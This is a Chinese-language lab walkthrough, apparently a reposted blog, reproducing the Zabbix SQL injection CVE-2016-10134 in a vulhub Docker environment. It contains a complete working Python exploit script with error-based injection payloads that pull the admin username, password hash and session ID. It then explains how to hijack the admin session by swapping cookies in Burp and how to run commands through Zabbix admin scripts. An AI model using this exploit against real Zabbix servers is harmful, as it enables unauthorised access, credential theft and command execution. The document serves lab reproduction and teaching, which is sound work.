Zabbix sql注入漏洞复现(CVE-2016-10134)

Zabbix sql注入漏洞复现(CVE-2016-10134)

环境搭建

zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统
kali ip:192.168.164.135
靶机ip:192.168.164.158
启动docker

systemctl start docker

下载vulhub

git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git

进入对应目录

cd vulhub/zabbix/CVE-2016-10134/

启动容器

docker-compose up -d

查看容器

docker ps

在这里插入图片描述
如果需要复现后面的getshell的话需要在靶机的配置文件zabbix_agentd.conf中添加EnableRemoteCommands = 1,过程如下
查看当前运行容器

docker ps

进入到cve-2016-10134_agent_1(这里的541为对应容器的CONTAINER ID,根据自己电脑修改)

docker exec -it 541 /bin/sh
vi /etc/zabbix/zabbix_agentd.conf

输入i进行编辑,添加EnableRemoteCommands = 1后按下esc键输入:wq保存并退出
在这里插入图片描述
重启容器

docker restart 541

如果遇到http://192.168.164.158:8080/queue.php?ddreset=1页面无法打开的情况,可以重新执行docker-compose up -d,正常运行是有4个docker镜像的

漏洞复现

sql注入

sql注入poc

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Date: 2016/8/18
# Modified by: Jamin Zhang

import urllib2
import sys, os
import re

def deteck_Sql():
    u'检查是否存在 SQL 注入'
    payload = "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
    try:
        response = urllib2.urlopen(url + payload, timeout=10).read()
    except Exception, msg:
        print msg
    else:
        key_reg = re.compile(r"INSERT\s*INTO\s*profiles")
        if key_reg.findall(response):
            return True


def sql_Inject(sql):
    u'获取特定sql语句内容'
    payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
        sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
    try:
        response = urllib2.urlopen(payload, timeout=10).read()
    except Exception, msg:
        print msg
    else:
        result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
        results = result_reg.findall(response)
        if results:
            return results[0]


if __name__ == '__main__':
    # os.system(['clear', 'cls'][os.name == 'nt'])
    print '+' + '-' * 60 + '+'
    print u'\t   Python Zabbix < 3.0.4 SQL 注入 Exploit'
    print '\t    Origin Author: http://www.waitalone.cn/'
    print '\t\t   Modified by: Jamin Zhang'
    print '\t\t   Date: 2016-08-18'
    print '+' + '-' * 60 + '+'
    if len(sys.argv) != 2:
        print u'用法: ' + os.path.basename(sys.argv[0]) + u' [Zabbix Server Web 后台 URL]'
        print u'实例: ' + os.path.basename(sys.argv[0]) + ' http://jaminzhang.github.io'
        sys.exit()
    url = sys.argv[1]
    if url[-1] != '/': url += '/'
    passwd_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from  users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    session_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    if deteck_Sql():
        print u'Zabbix 存在 SQL 注入漏洞!\n'
        print u'管理员  用户名密码:%s' % sql_Inject(passwd_sql)
        print u'管理员  Session_id:%s' % sql_Inject(session_sql)
    else:
        print u'Zabbix 不存在 SQL 注入漏洞!\n'
1.py http://192.168.164.158:8080/

在这里插入图片描述
获取到的密码可以通过md5进行查询
在这里插入图片描述
如果解密没有成功可以通过sessionid值进行欺骗登入后台
访问http://192.168.164.158:8080/setup.php,使用burp抓包
在这里插入图片描述
修改zbx_sessionid为前面获取到的sessionid
在这里插入图片描述
成功登陆后台
在这里插入图片描述

后台getshell

在administration下的scripts添加命令

touch /tmp/hello

在这里插入图片描述
触发执行
进入http://192.168.164.158:8080/latest.php?ddreset=1
点击Host groups的select,全选
在这里插入图片描述
点击filter
在这里插入图片描述
选择我们创建的命令
在这里插入图片描述
点击执行
在这里插入图片描述
进入对应容器查看
在这里插入图片描述
发现已经成功写入

参考文章

https://xz.aliyun.com/t/6874
https://jaminzhang.github.io/security/Zabbix-latest-SQL-Injection-Vulnerability-and-EXP/
https://vulhub.org/#/environments/zabbix/CVE-2016-10134/

猜你喜欢

转载自blog.csdn.net/qq_43645782/article/details/106588179
今日推荐